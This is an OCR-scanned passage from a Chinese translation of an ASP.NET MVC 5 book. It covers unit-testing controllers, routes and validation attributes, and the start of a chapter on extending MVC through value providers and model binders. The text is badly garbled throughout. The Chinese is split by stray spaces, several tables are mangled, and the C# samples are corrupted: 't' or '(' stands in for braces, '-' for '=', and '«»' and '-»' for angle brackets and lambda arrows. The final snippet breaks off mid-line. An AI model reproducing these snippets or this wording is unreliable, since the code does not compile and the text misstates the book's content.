了 一 个 隔离 的 地 方 。 所 有 控制 器 都 可 以 拥有 可 读 性 强 的 测试 程序 。 同 样 重 要 的 是 ， 如 果 需 要 
修改 逻辑 ， 我 们 只 需要 在 一 个 地 方 修改 并 且 只 需要 改变 少量 测试 ， 而 不 需要 修改 数 十 甚至 数 
百 个 控制 器 测试 。 

ASPNET Web API 通 过 一 个 类 似 于 MVC 的 系统 ， 也 支持 操作 结果 。 虽 然 Web API 依 赖 于 
SystemNetHttp.dll 中 的 新 抽象 意味 着 我 们 可 以 轻松 地 编写 易于 测试 的 控制 器 ， 但 是 正确 地 创 
建 请 求 和 响应 对 象 仍然 很 困难 。Web API 中 的 操作 结果 (任何 实现 了 
System .Web.Http.IHttpActionResult 的 对 象 ) 隔离 了 请 求 和 响应 对 象 ， 让 开发 人 员 为 自己 的 控 
制 器 编写 比较 简单 的 单元 测试 。Web API 的 ApiController 基 类 提供 了 几 十 种 方法 ， 用 于 创建 操 
作 结 果 类 ， 这 些 结果 类 都 由 ASPNET 团 队 编 写 。 


4. 对 UpdateModel 使 用 操作 参数 


ASPNET MVC 中 的 模型 绑 定 系统 负责 将 请 求 数据 转换 成 操作 可 使 用 的 值 。 请 求 数据 可 
能 来 自 提交 的 表单 ， 也 可 能 来 自 查询 字符 串 值 ， 甚 至 可 能 来 自 URL 路 径 的 部 分 内 容 。 无 论 请 
求 数据 来 自 哪里 ， 在 控制 器 中 通常 都 使 用 两 种 方式 来 获取 : 作为 一 个 操作 参数 获取 ， 通 过 调 
用 UpdateModel( 或 者 TryUpdateModel， 只 是 拼写 稍微 长 点 ) 获 取 。 

下 面 的 操作 方法 的 例子 便 是 采用 这 两 种 方式 获取 请 求 数据 : 


[HttpPost] 
public ActionResult Edit(int id) 
t 
Person person - new Person(); 
UpdateModel (person); 
[...other code left out for clarity...] 
} 


参数 id 和 变量 person 使 用 了 上 面 提 到 的 两 种 方式 来 获取 请 求 数 据 。 使 用 操作 参数 获取 请 求 
数据 为 单元 测试 带 来 的 好 处 是 显而易见 的 , 这 样 可 以 很 容易 地 为 单元 测试 提供 操作 方法 需要 的 
任何 类 型 的 实例 ， 而 没 必要 改变 任何 基础 结构 。 另 一 方面 ，UpdateModel 是 Controller 基 类 的 一 
个 非 虚拟 方法 ， 这 意味 着 不 能 轻易 地 覆盖 它 的 行为 。 

如 果真 需要 更 新 UpdateModel， 我 们 有 几 个 策略 可 以 把 数据 传 入 模型 绑 定 系 统 。 最 明显 
的 一 个 策略 便 是 重 写 ControllerContext( 正 如 前 面 所 介绍 的 )， 并 为 模型 绑 定 器 提供 假 的 表单 数 
据 。Controller 类 也 可 以 向 模型 绑 定 器 提供 能 够 用 来 提供 假 数据 的 与 /或 值 提供 器 。 从 我 们 模拟 
的 探索 中 ， 可 以 很 清楚 地 知道 这 些 选项 是 我 们 最 后 的 选择 。 
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5. 利用 操作 过 滤器 实现 正 交 


这 条 忠告 类 似 于 操作 结果 那 条 忠告 。 它 的 核心 推荐 是 把 测试 难度 大 的 代码 隔离 到 一 个 可 
重用 的 单元 中 ， 从 而 把 困难 的 测试 与 可 重用 单元 绑 在 了 一 块 ， 而 不 会 波及 整个 控制 器 测试 。 

不 过 ， 这 也 不 是 说 没有 了 单元 测试 的 负担 。 不 像 操 作 结果 情形 那样 ， 我 们 没有 任何 可 以 
直接 检查 的 输入 或 输出 。 一 个 操作 过 滤器 通常 应 用 于 一 个 操作 方法 或 一 个 控制 器 类 。 为 了 
能 够 进行 单元 测试 ， 我 们 只 需要 确保 该 特性 是 存在 的 ， 而 把 实际 功能 的 测试 留 给 其 他 人 来 
做 。 单 元 测试 可 以 使 用 一 些 简单 的 反射 来 查找 并 且 确 认 特 性 (和 一 些 需要 检查 的 重要 参数 ) 
的 存在 。 

还 有 一 个 重要 方面 是 ， 当 单元 测试 调用 操作 时 ， 操 作 过 滤器 并 不 运行 。 操 作 过 滤器 之 所 
以 能 够 在 一 个 标准 的 ASPNET MVC 或 Web API 应 用 程序 中 运行 ， 是 因为 框架 本 身 会 在 合适 的 
时 候 查找 和 运行 它 。 因 为 操作 过 滤器 被 附加 到 的 方法 正在 运行 ， 所 以 对 于 使 它们 运行 的 特性 
没有 什么 神奇 的 。 

当 运 行 单元 测试 中 的 操作 时 ， 请 记 住 ， 不 要 依赖 于 操作 过 滤器 的 执行 。 这 可 能 稍微 会 使 
操作 方法 中 的 逻辑 复杂 化 ， 而 复杂 程度 取决 于 操作 过 滤器 所 做 的 具体 工作 。 例 如 ， 如 果 过 滤 
器 向 ViewBag 属 性 添加 数据 ， 那 么 当 操作 在 测试 下 运行 时 ， 要 添加 的 数据 是 不 存在 的 。 因 此 ， 
我 们 需要 意识 到 单元 测试 和 控制 器 本 身 的 事实 。 

本 节 标 题 中 的 忠告 建议 操作 过 滤器 的 使 用 应 限于 正 交 活 动 ， 之 所 以 这 样 ， 是 因为 操作 过 
滤器 在 单元 测试 环境 中 不 能 运行 。 如 果 操作 过 滤器 正在 进行 使 操作 执行 的 关键 步骤， 那么 这 
些 代 码 可 能 应 该 放 在 其 他 地 方 ， 比 如 一 个 辅助 类 或 服务 中 ， 而 不 是 一 个 过 滤器 特性 中 。 


14.3.2 ”路 由 测试 


一 旦 了 解 到 所 有 基础 结构 所 在 的 正确 位 置 ， 路 由 测试 就 会 变 成 一 个 十 分 简单 的 过 程 。 因 
为 路 由 使 用 的 是 ASPNET 核 心 基础 结构 ， 所 以 我 们 会 采用 Moq 来 编写 蔡 代 程序 。 

默认 的 ASPNET MVC 项 目 模板 会 在 global.asax 文 件 中 注册 两 个 路 由 : 

public static void RegisterRoutes (RouteCollection routes) 


{ 
routes.IgnoreRoute ("(resource].axd/(*pathInfo)"); 


routes.MapRoute( 


"Default", 
"(controller]/(action]/([(id)", 
new ( controller = "Home", action = "Index", id = UrlParameter.Optional 


} 
); 

} 

使 用 ASPNET MVC 工 具 把 注册 函数 创建 为 一 个 公共 静态 函数 是 非常 方便 的 ， 也 就 是 说 ， 
我 们 可 以 非常 容易 地 从 一 个 带 有 RouteCollection 实 例 的 单元 测试 中 调用 它 ， 并 用 它 来 把 所 有 
路 由 映射 到 集合 中 ， 以 便 检查 和 执行 。 

在 测试 这 些 代码 以 前 ， 还 需要 学 习 一 些 路 由 的 知识 。 有 关 路 由 的 内 容 在 第 9 章 已 经 做 过 相 
应 的 介绍 ， 现 在 需要 重点 理解 基本 路 由 注册 系统 的 工作 原理 。 如 果 观 察 RouteCollection 类 上 
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的 Add 方 法 ， 会 注意 到 ， 它 采用 一 个 名 称 和 一 个 RouteBase 类 型 的 实例 作为 参数 : 


public void Add(string name, RouteBase item) 


RouteBase 是 一 个 抽象 类 ， 它 的 主要 作用 是 将 传 入 的 请 求 数据 映射 到 路 由 数据 中 : 


public abstract RouteData GetRouteData (HttpContextBase httpContext) 


ASPNET MVC 应 用 程序 通常 不 直接 使 用 Add 方 法 ， 而 是 直接 调用 MapRoute 方 法 


(ASPNET MVC 框 架 提供 的 一 个 扩展 方法 )。 在 MapRoute 方 法 内 部 ，ASPNET MVC 框 架 本 身 
使 用 一 个 合适 的 RouteBase 对 象 调用 Add 方 法 。 从 使 用 角度 来 看 ， 我 们 只 需要 关心 返回 的 
RouteData 结 果 ; 具体 地 说 , 我 们 想 知 道 调用 了 哪个 处 理 程序 , 返回 的 路 由 结果 数据 值 是 什么 。 


这 里 的 指导 原则 也 适用 于 Web API 应 用 程序 。 路 由 注册 通常 使 用 MapHttpRoute 完 成 (或 者 


使 用 新 的 基于 路 由 的 特性 系统 )， 所 以 只 需要 调用 WebApiConfig.RegisterRoutes 来 为 单元 测试 
注册 路 由 。 


使 用 MVC 或 Web API 时 ， 如 果 遵 循 了 前 面 关于 在 控制 器 中 优先 使 用 操作 结果 的 建议 ， 那 


么 很 少 有 单元 测试 需要 访问 系统 中 的 实际 路 由 。 


1. 测试 lgnoreRoute 函数 调用 
下 面 开 始 IgnoreRoute 调 用 ， 并 编写 一 个 展示 其 应 用 的 测试 程序 : 


[TestMethod] 
public void RouteForEmbeddedResource() 
t 


// Arrange 

var mockContext - new Mock«HttpContextBase»(); 

mockContext.Setup(c -» c.Request.AppRelativeCurrentExecutionFilePath) 
.Returns ("-/handler.axd"); 

var routes = new RouteCollection(); 

MvcApplication.RegisterRoutes (routes); 


// Act 
RouteData routeData = routes.GetRouteData (mockContext.Object); 


// Assert 
Assert.IsNotNull (routeData); 
Assert.IsInstanceOfType (routeData.RouteHandler, 
typeof (StopRoutingHandler)); 
} 


Arrange 部 分 创建 了 一 个 HttpContextBase 类 型 的 模拟 容器 。 因 为 路 由 需要 知道 请 求 的 URL 


是 什么 ， 所 以 它 调用 了 Request.AppRelativeCurrentExecutionFilePath。 我 们 所 需要 做 的 是 ， 告 
诉 Mog 每 当 路 由 调用 该 方法 时 ， 返 回想 要 测试 的 URL。 剩余 的 Arrange 部 分 创建 了 一 个 空 的 路 
由 集合 ， 并 请 求 应 用 程序 把 它 的 路 由 注册 到 该 集合 中 。 


有 


然后 Act 部 分 要 求 路 由 从 请 求 数据 中 获取 路 由 数据 ， 并 返回 一 个 RouteData 实 例 。 如 果 没 


匹配 的 路 由 ，RouteData 实 例 就 会 为 空 ， 因 此 ， 第 一 个 测试 是 要 确保 存在 匹配 路 由 。 对 于 该 


测试 , 不 必 关 心 任何 路 由 数据 值 , 而 只 需要 知道 命中 一 个 忽略 路 由 (ignore route), 之 所 以 这 样 ， 
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是 因为 路 由 处 理 程序 是 System Web.Routing StopRoutingHandler 的 一 个 实例 。 
2. 测试 MapRoute 函数 调用 


由 于 这 些 是 与 应 用 程序 功能 实际 匹配 的 路 由 , 因此 MapRoute 函 数 调用 的 测试 可 能 会 更 有 
趣 。 虽 然 默认 只 有 一 个 路 由 ， 但 是 传 入 的 URL 中 可 能 存在 多 个 与 该 路 由 相 匹配 。 
第 一 个 测试 确保 传 入 的 首页 请 求 能 够 映射 到 默认 的 控制 器 和 操作 : 


[TestMethod] 
public void RouteToHomePage () 
t 
var mockContext = new Mock«HttpContextBase»(); 
mockContext.Setup(c -» c.Request.AppRelativeCurrentExecutionFilePath) 
«Returns ("~/"); 
var routes = new RouteCollection(); 
MvcApplication.RegisterRoutes (routes); 


RouteData routeData = routes.GetRouteData (mockContext.Object); 


Assert.IsNotNull (routeData); 

Assert.AreEqual("Home", routeData.Values["controller"]); 

Assert.AreEqual("Index", routeData.Values["action"]); 

Assert.AreEqual(UrlParameter.Optional, routeData.Values["id"]); 
} 


不 像 刚才 的 忽略 路 由 测试 ， 该 测试 需要 知道 路 由 内 部 的 数据 值 。 路 由 系统 填充 controller、 
action 和 id 的 值 。 因 为 该 路 由 有 三 个 可 蔡 换 的 部 分 ， 所 以 这 里 需要 使 用 4 个 测试 ， 它 们 的 数据 
和 结果 可 能 如 表 14-1 所 示 。 如 果 单 元 测试 框架 支持 数据 驱动 测试 ， 那 么 路 由 将 是 利用 这 些 功 
能 的 不 二 选择 。 


表 14-1 默认 路 由 映射 示例 
[Hm | | 


Help 
| Help 


UrlParameter.Optional 
~/Help UrlParameter.Optional 
~/Help/List 


~/Help/Topic/2 


UrlParameter.Optional 
2 


3. 不 匹配 路 由 的 测试 


不 需要 对 不 匹配 路 由 编写 测试 代码 。 到 现在 为 止 编写 的 测试 都 是 自己 编写 的 代码 测试 ; 
也 即 调用 IgnoreRoute 或 MapRoute 方 法 。 如 果 为 不 匹配 路 由 编写 测试 , 我 们 只 需要 在 该 点 上 测 
试 路 由 。 可 以 假设 它 能 够 正确 运行 。 


第 14 章 单元 测试 


14.3.3 ”验证 测试 


ASPNET MVC 和 Web API 中 的 验证 系统 利用 了 .NET 框 架 中 的 Data Annotations 库 , 其 中 包 
括 实现 了 TValidatableObject 接 口 的 自 验证 对 象 ,， 和 基于 上 下 文 的 验证 , 该 验证 允许 验证 器 访问 
包含 验证 属性 的 “容器 ”对 象 。MVC 使 用 IClientValidatable 接 口 对 验证 系统 进行 了 扩展 ， 这 
样 就 可 以 在 客户 端 验 证 中 使 用 验证 特性 。 除 了 内 置 的 DataAnnotations 验 证 特性 外 ，MVC 还 添 
加 了 两 个 新 的 验证 器 : CompareAttribute 和 RemoteAttribute。 

客户 端的 变化 是 巨大 的 。ASPNET MVC 团 队 添 加 了 对 非 侵入 式 验 证 的 支持 ， 从 而 可 以 实现 
将 验证 规则 作为 HTML 元素 而 不 是 内 蔡 的 JavaScript 代 码 来 泻 染 。MVC 是 ASPNET 团 队 承诺 的 
第 一 个 充分 结合 了 JavaScript 中 jQuery 家 族 的 框架 。 尽 管 非 侵 入 式 验 证 特性 以 独立 于 框架 的 形 
式 来 实现 ， 但 是 实现 使 用 的 MVC 则 基于 jQuery 和 jQuery Validate。 

开发 人 员 经 常 编写 新 的 验证 规则 ， 大 部 分 应 用 都 会 很 快 超过 内 置 的 4 个 验证 规则 
(Required、Range、RegularExpression 和 StringLength)。 我 们 如 果 编 写 验证 规则 ， 还 需要 编写 
相应 的 服务 器 端 验证 代码 ， 这 些 验 证 代码 可 以 由 服务 器 端的 单元 测试 框架 来 测试 。 此 外 ， 可 
以 使 用 服务 器 端 单元 测试 框架 来 测试 IClientValidatable 接 口 的 元 数据 API， 以 确保 该 规则 发 出 
正确 的 客户 端 规 则 。 一 旦 熟悉 了 数据 注解 验证 系统 的 工作 原理 ， 为 这 些 代 码 片 段 编写 单元 测 
试 是 比较 简单 的 。 


客户 端 (JAVASCRIPT) 单 元 测试 


如 果 没 有 与 验证 规则 合理 匹配 的 相应 客户 端 规则 ， 开 发 人 员 可 能 会 选择 编写 一 小 段 
JavaScript 代 码 ， 并 且 这 些 JavaScript 代 码 可 以 使 用 客户 端 单元 测试 框架 ( 像 QUnit， 由 jQuery 团 
队 开 发 的 单元 测试 框架 ) 进 行 单元 测试 为 客户 端 JavaScript 代 码 编写 单元 测试 超出 了 本 章 的 讨 
论 范围 。 但 笔者 鼓励 开发 人 员 花 一 些 时 间 为 自己 的 JavaScript 代 码 找到 一 个 好 的 客户 端 单元 测 
试 系统 。 


一 个 验证 特性 派生 于 名 称 空间 System.ComponentModel.DataAnnotations 中 的 基 类 
ValidationAttribute。 实 现 验证 逻辑 也 就 是 重 写 两 个 IsValid 方 法 中 的 一 个 。 就 像 前 面 第 6 章 中 最 
大 单词 数 验证 器 ， 其 开始 代码 如 下 所 示 : 


public class MaxWordsAttribute : ValidationAttribute 
t 
protected override ValidationResult IsValid( 
object value, ValidationContext validationContext) 
t 
return ValidationResult.Success; 
i 
} 


验证 特性 拥有 作为 参数 传递 给 它 的 验证 上 下 文 。 这 是 NET 4 的 数据 注解 库 中 的 新 重 载 。 
当然 也 可 以 重 写 NET 3.5 的 数据 注解 验证 API 中 原始 的 IsValid 版 本 : 


public class MaxWordsAttribute : ValidationAttribute 
{ 
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public override bool IsValid(object value) 
t 
return true; 


} 
} 


具体 选择 哪个 API 取 决 于 是 否 需要 访问 验证 上 下 文 。 验 证 上 下 文 可 以 用 来 与 包含 值 的 容 
器 对 象 进行 交互 。 当 考虑 单元 测试 时 ， 这 是 一 个 问题 ， 因 为 任何 使 用 验证 上 下 文中 信息 的 验 
证 器 都 需要 一 个 验证 上 下 文 。 如 果 验 证 器 重 写 了 没有 验证 上 下 文 的 IsValid 版 本 ， 那 么 可 以 调 
用 它 上 面 只 需要 模型 值 和 参数 名 称 的 Validate 版 本 。 

另 一 方面 ， 如 果实 现 了 包含 验证 上 下 文 的 IsValid 版 本 (并 且 需 要 验证 上 下 文中 的 值 )， 就 
必须 调用 包含 验证 上 下 文 的 Validate 版 本 ; 否则 ，IsValid 中 的 验证 上 下 文 就 是 空 的 。 从 理论 上 
讲 ， 任 何 IsValid 的 实现 必须 是 有 弹性 的 ， 以 防 调用 时 没有 验证 上 下 文 ， 因 为 调用 它 的 代码 很 有 
可 能 是 使 用 NET 3.5 数 据 注 解 API 编 写 的 ， 不 过 在 实际 应 用 中 ， 在 ASPNET MVC 3 及 其 以 后 版 
本 中 使 用 的 验证 器 ， 就 可 以 确定 它们 总 会 有 一 个 验证 上 下 文 。 

这 就 意味 着 当 编 写 单元 测试 时 , 我 们 需要 给 验证 器 提供 一 个 验证 上 下 文 (最 起 码 要 在 知道 
这 些 验证 器 在 使 用 验证 上 下 文 时 提供 ， 但 在 实际 应 用 中 ， 最 好 总 是 提供 验证 上 下 文 )。 

正确 地 创建 ValidationContext 对 象 是 非常 坏 手 的 。 有 几 个 成 员 需 要 正确 地 设置 以 便 验证 器 
使 用 。ValidationContext 的 构造 函数 需要 三 个 参数 : 要 被 验证 的 模型 实例 、 服 务 容器 和 项 集合 。 
这 三 个 参数 中 只 有 模型 实例 是 必要 的 ， 其 他 两 个 应 该 是 null， 因 为 在 ASPNET MVC 应 用 程序 
中 不 使 用 这 两 个 参数 。 

ASPNET MVC 和 Web API 可 以 做 两 个 不 同 的 验证 : 模型 级 别 验证 和 属性 级 别 验证 。 模 型 
级 别 验证 在 模型 对 象 作为 一 个 整体 被 验证 时 执行 ( 即 验证 特性 置 于 类 上 );， 属性 级 别 的 验证 在 
验证 模型 的 单个 属性 时 执行 ( 即 验证 特性 置 于 模型 类 的 内 部 属性 上 )。ValidationContext 对 象 在 
每 个 情形 中 都 有 不 同 的 设置 。 

当 执 行 模型 级 别 的 验证 时 ， 单 元 测试 对 ValidationContext 对 象 的 设置 如 表 14-2 所 示 ; 当 执 
行 属性 级 别 的 验证 时 ， 单 元 测试 使 用 表 14-3 所 示 的 验证 规则 。 


表 14-2 ”模型 验证 的 验证 上 下 文 


属 性 内 容 

DisplayName 用 在 错误 提示 设置 消息 中 ， 用 来 替换 {0}。 对 于 模型 验证 ， 通 常 指 类 型 的 简单 名 称 
( 即 不 带 名 称 空间 前 绥 的 类 名 ) 

Items 不 应 用 于 ASP.NET MVC 或 Web API 应 用 程序 

MemberName 不 应 用 于 模型 验证 

ObjectInstance 传递 到 构造 函数 的 值 ， 要 验证 模型 的 实例 。 注 意 ， 这 与 传递 给 Validate 的 值 是 同一 
个 值 

ObjectType 要 验证 模型 的 类 型 。 自 动 设置 为 与 传递 到 ValidationContext 构 造 函数 对 象 相 匹配 的 
类 型 

ServiceContainer 不 应 用 于 ASPNET MVC 或 Web API 应 用 程序 
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表 14-3 ”属性 验证 的 验证 上 下 文 


属 性 内 * 

DisplayName 用 在 错误 提示 消息 中 ， 用 来 替换 {0}。 对 于 属性 验证 ,通常 指 属性 的 名 称 ， 尽 管 它 
可 能 被 像 [Display] 或 [DisplayName] 这 样 的 特性 影响 

Ttems 不 应 用 于 ASP.NET MVC 或 Web API 应 用 程序 

MemberName 包含 要 验证 的 属性 的 真实 名 称 。 不 像 DisplayName， 用 于 显示 目的 ， 该 属性 是 它 出 
现在 模型 类 中 的 精确 属性 名 称 

ObjectInstance 传递 到 构造 函数 的 值 , 位 于 包含 要 验证 属性 的 模型 实例 中 。 不 像 模型 验证 的 情形 ， 
它 与 要 传递 到 Validate 的 值 不 同 ， 因 为 传递 到 Validate 的 值 是 属性 值 

ObjectType 要 验证 模型 的 类 型 ， 而 不 是 要 验证 属性 的 类 型 。 自 动 设置 为 与 传递 到 
ValidationContext 构 造 函 数 对 象 相 匹 配 的 类 型 

ServiceContainer 不 应 用 于 ASPNET MVC 或 Web API 应 用 程序 


让 我 们 看 看 每 个 场景 中 的 一 些 示 例 代 码 。 下 面 的 代码 展示 了 如 何 初始 化 模型 级 别 单元 测 
试 的 验证 上 下 文 (假设 正在 测试 一 个 名 为 Modelclass 的 假设 类 实例 ): 


Var model = 
var context 


new ModelClass ( /* initialize properties here */ }; 


new ValidationContext (model, null, null) ( 


DisplayName = model.GetType().Name 


u 


var validator = new ValidationAttributeUnderTest (); 


validator.Validate (model, context); 


在 测试 内 部 ， 如 果 存 在 错误 ，Validate 调 用 将 抛 出 ValidationException 类 的 一 个 实例 。 当 期 
望 验证 失败 时 ， 应 该 用 一 个 try/catch 代 码 块 环绕 Validate 调 用 ， 或 者 使 用 测试 框架 的 优先 方法 


来 进行 异常 测试 。 


现在 展示 属性 级 别 测试 的 代码 。 假 设 正在 测试 ModelClass 模 型 上 的 FirstName 属 性 ， 则 测 


试 代码 如 下 所 示 : 


var model = 
var context 


new ModelClass { FirstName = "Brad" }; 


new ValidationContext (model, null, null) ( 


DisplayName - "The First Name", 


MemberName 


n 


= "FirstName" 


var validator - new ValidationAttributeUnderTest () ; 


validator.Validate (model.FirstName, context); 

对 比 前 面 的 模型 级 别 示 例 ， 有 两 个 关键 的 不 同 之 处 : 

e 第 一 ， 设 置 MemberName 属 性 值 来 匹配 属性 名 称 ， 而 模型 级 别 验证 示例 没有 设置 任何 
MemberName 属 性 值 。 


e 第 二 , 在 调 | 


Validate 时 ， 要 测试 属性 的 值 传递 给 Validate， 而 在 模型 级 别 验证 示例 中 ， 


是 把 模型 本 身 传递 给 Validate。 
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当然 ， 如 果 知 道 验证 特性 需要 访问 验证 上 下 文 ， 那 么 所 有 这 些 代码 就 都 是 必要 的 。 如 果 
知道 特性 不 需要 验证 上 下 文 信息 , 那么 使 用 简单 的 只 需要 对 象 值 和 显示 名 称 的 Validate 方 法 即 
可 。 这 两 个 值 分 别 和 传递 到 ValidationContext 构 造 函 数 的 值 以 及 设置 到 验证 上 下 文 的 
DisplayName 属 性 中 的 值 相 匹 配 。 


14.4 小 结 
本 章 前 半 部 分 简要 介绍 了 单元 测试 和 测试 驱动 开发 。 通 过 学 习 ， 我 们 应 该 对 高 效 的 单元 


测试 机 制 有 一 个 全 面 理解 。 后 半 部 分 提供 了 一 些 真实 的 指导 , 阐述 了 当 为 ASPNETMVC 和 Web 
API 应 用 程序 编写 单元 测试 时 ， 应 该 做 以 及 应 该 避免 的 事项 ， 从 而 增强 了 理论 知识 。 


第 


p 


扩展 ASP.NET MVC 


本 章 主要 内 容 

e 模型 的 扩展 方法 

o 视图 的 扩展 方法 

e 控制 器 的 扩展 方法 

如 本 章 前 言 所 述 ， 本 章 所 有 代码 均 通过 NuGet 提 供 。 本 章 中 适用 NuGet 代 码 示例 的 地 方 均 
做 了 说 明 。 访 问 以 下 网 址 可 获得 脱 机 使 用 的 代码 : http://www.wrox.com/go/proaspnetmvc5。 

第 1 章 中 曾 强调 层 在 ASPNET 框 架 中 的 重要 性 。 在 2002 年 ，ASPNET 1.0 发 布 时 ， 大 部 分 
人 不 能 将 核心 运行 时 ( 即 名 称 空间 System.Web 中 的 类 ) 和 ASPNET Web Forms 应 用 程序 平台 ( 即 
名 称 空间 System Web.UI 中 的 类 ) 区 分 开 来 .ASPNET 开 发 团队 在 简单 的 核心 ASPNET 运 行 时 抽 
象 之 上 创建 了 复杂 的 Web Forms 抽 象 。 

ASPNET 团 队 的 一 些 新 技术 建立 在 核心 运行 时 之 上 ， 其 中 包括 ASPNET MVC 5。 因 为 
ASPNET MVC 框 架 建 立 在 公共 抽象 之 上 ， 所 以 ASPNET MVC 框 架 能 实现 的 任何 功能 ， 任 何 
人 (Microsoft 公 司 内 部 或 外 部 的 人 员 ) 也 都 可 以 实现 。 出 于 同样 的 原因 ，ASPNET MVC 框 架 本 
身 也 由 若干 层 抽象 组 成 ， 从 而 使 得 开发 人 员 能 够 选择 他 们 需要 的 MVC 片 段 ， 蔡 换 或 修改 扩展 
他 们 不 需要 的 片段 ,对 于 每 个 后 续 版 本 , ASPNETMVC 团 队 都 开放 了 更 多 的 框架 内 部 定制 点 。 

一 些 开发 人 员 不 需要 了 解 平台 的 底层 扩展 ， 因 为 他 们 最 多 通过 ASPNET MVC 的 第 三 方 
扩展 间接 地 来 使 用 这 些 扩展 。 至 于 其 他 ， 这 些 定制 点 的 可 用 性 在 决定 如 何在 应 用 程序 中 充分 
利用 MVC 方 面 起 着 关键 性 作用 。 本 章 将 深入 讲解 如 何 将 MVC 片 段 连接 在 一 起 ， 以 及 我 们 设 
计 用 于 插入 、 补 充 或 替换 的 地 方 。 
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的 注意 本 章 中 所 有 的 示例 源 代码 都 可 在 名 为 Wrox.ProMvc5.ExtendingMve 的 
NuGet 包 中 获取 。 采用 Empty 模 板 并 选择 MVC, 创建 一 个 ASPNET Web 应 用 程序 ， 
并 添加 NuGet 包 ， 就 可 以 得 到 几 个 本 章 所 讨论 功能 的 完整 示例 。 本 章 只 展示 了 示 
例 代码 的 重要 部 分 ， 因此， 阅读 NuGet 包 中 的 完整 源 代码 是 理解 这 些 扩展 工作 原 


| 理 的 关键 。 


15.4 模型 扩展 


ASPNET MVC 5 中 的 模型 系统 包含 几 个 可 扩展 部 分 ， 其 中 包括 使 用 元 数据 描述 模型 、 验 
证 模型 以 及 影响 从 请 求 数据 中 构造 模型 的 能 力 。 下 面 对 系统 中 的 每 个 可 扩展 点 ， 都 列举 相应 
的 一 个 示例 。 


15.1.1 把 请 求 数据 转换 为 模型 


将 请 求 数据 (比如 表单 数据 、 查 询 字符 串 数据 或 路 由 信息 ) 转 换 为 模型 的 过 程 称 为 模型 绑 
定 。 模 型 绑 定 的 过 程 分 为 两 个 阶段 : 

o 通过 使 用 值 提 供 器 理解 数据 的 来 源 

e 使 用 这 些 值 创建 /更 新 模型 对 象 (通过 使 用 模型 绑 定 器 ) 


1. 使 用 值 提供 器 解析 请 求 数据 


当 ASPNETMVC 应 用 程序 参与 模型 绑 定时 ， 真 实 模型 绑 定 过程 使 用 的 值 都 来 自 值 提供 
器 。 值 提供 器 的 作用 仅仅 是 访问 能 够 在 模型 绑 定 过 程 中 正确 使 用 的 信息 。 ASPNET MVC 框 架 
自 带 的 若干 值 提供 器 可 以 提供 以 下 数据 源 中 的 数据 : 
子 操作 (RenderAction) 的 显 式 值 
表单 值 
来 自 XMLHttpRequest 的 JSON 数 据 
路 由 值 
查询 字符 串 值 
e 上 传 的 文件 
值 提供 器 来 自 值 提供 器 工厂 , 并 且 系 统 按照 值 提供 器 的 注册 顺序 来 从 中 搜寻 数据 (上 面 的 
列表 使 用 的 是 默认 顺序 ， 自 上 而 下 )。 开 发 人 员 可 以 编写 自己 的 值 提供 器 工厂 和 值 提 供 器 ， 
且 还 可 以 把 它们 插入 到 包含 在 ValueProviderFactories.Factories 中 的 工厂 列表 中 。 当 在 模型 绑 定 
期 间 需 要 使 用 额外 的 数据 源 时 ， 开 发 人 员 通 常 选择 编写 自己 的 值 提供 器 工厂 和 值 提供 器 。 
除了 ASPNETMVC 本 身 包含 的 值 提供 器 工厂 以 外 ， 开 发 团队 也 在 ASPNET MVC 
Futures 包 中 包含 了 一 些 提 供 器 工厂 和 值 提供 器 。 有 具体 包括 以 下 提供 器 : 
e Cookie 值 提供 器 
e 服务 器 变量 值 提供 器 
e _ Session 值 提供 器 


E 
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e TempData 值 提供 器 
Microsoft 已 经 开源 了 MVC 所 有 内 容 ， 包 括 MVC Futues & , W ht 
http://aspnetwebstack.codeplex.com/， 通 过 这 个 网 站 我 们 可 以 学 习 创 建 自己 的 值 提供 器 和 工厂 。 


2. 创建 带 有 模型 绑 定 器 的 模型 


模型 扩展 的 另 一 部 分 是 模型 绑 定 器 。 它 们 从 值 提供 器 系统 中 获取 值 ， 并 利用 获取 的 值 创 建新 
模型 或 者 填充 已 有 模型 。ASPNETMVC 中 的 默认 模型 绑 定 器 (为 方便 起 见 ， 命 名 为 
DefaultModelBinden) 是 一 段 功 能 非常 强大 的 代码 ， 它 可 以 对 传统 类 、 集 合 类 、 列 表 、 数 组 其 
至 字典 进行 模型 绑 定 。 
默认 模型 绑 定 器 不 支持 不 可 变 对 象 : 对 象 的 初始 值 必须 通过 构造 函数 设置 ， 之 后 不 能 
变 。~/Areas/ModelBinder 中 的 模型 绑 定 器 示例 代码 包括 CLR 中 Point 对 象 的 模型 绑 定 器 的 源 代 
码 。 由 于 Point 类 是 不 可 变 的 ， 因 此 我 们 必须 使 用 它 的 值 构造 一 个 新 实例 : 
public class PointModelBinder : IModelBinder { 
public object BindModel (ControllerContext controllerContext, 
ModelBindingContext bindingContext) ( 
var valueProvider - bindingContext.ValueProvider; 
int x = (int)valueProvider.GetValue ("X").ConvertTo (typeof (int)); 
int y = (int)valueProvider.GetValue ("Y").ConvertTo (typeof (int)); 
return new Point(x, y); 
; ) 
当 创建 一 个 新 的 模型 绑 定 器 时 ， 我 们 需要 告知 ASPNETMVC 框 架 存 在 一 个 新 的 模型 绑 
定 器 以 及 何 时 使 用 它 。 可 以 使 用 [ModelBinder] 特 性 来 装饰 绑 定 类 ， 也 可 以 在 ModelBinders. 
Binders 的 全 局 列表 中 注册 新 的 模型 绑 定 器 。 
模型 绑 定 器 往往 容易 被 忽略 的 一 个 责任 是 ， 验证 它们 要 绑 定 的 值 。 前 面 的 示例 代码 未 有 
包含 任何 验证 逻辑 ， 因 此 看 上 去 非常 简单 ， 而 完整 的 示例 代码 则 包含 对 验证 的 支持 ， 但 这 将 
使 得 示例 过 度 复杂 。 在 一 些 情形 中 ， 由 于 知道 模型 绑 定 要 绑 定 的 类 型 ， 因 此 支持 泛 型 验证 可 
E 就 变 得 不 必要 (因为 我 们 可 以 直接 将 验证 逻辑 硬 编码 到 模型 绑 定 器 中 )， 对 于 广义 的 模型 绑 
定 器 ， 我 们 可 以 使 用 内 置 的 验证 系统 来 查找 用 户 提供 的 验证 器 ， 进 而 确保 模型 的 正确 性 。 
在 与 NuGet 包 中 代码 相 匹配 的 扩展 示例 中 ， 我 们 看 到 了 一 个 更 完整 的 模型 绑 定 器 版 本 。 
BindModel 的 新 实现 看 起 来 仍然 比较 简单 ， 因 为 我 们 把 所 有 的 检索 、 转 换 和 验证 逻辑 移 到 了 
一 个 辅助 方法 中 : 


public object BindModel(ControllerContext controllerContext, 
ModelBindingContext bindingContext) ( 


if (!String.IsNullOrEmpty (bindingContext.ModelName) && 


!bindingContext.ValueProvider.ContainsPrefix (bindingContext.ModelNa 

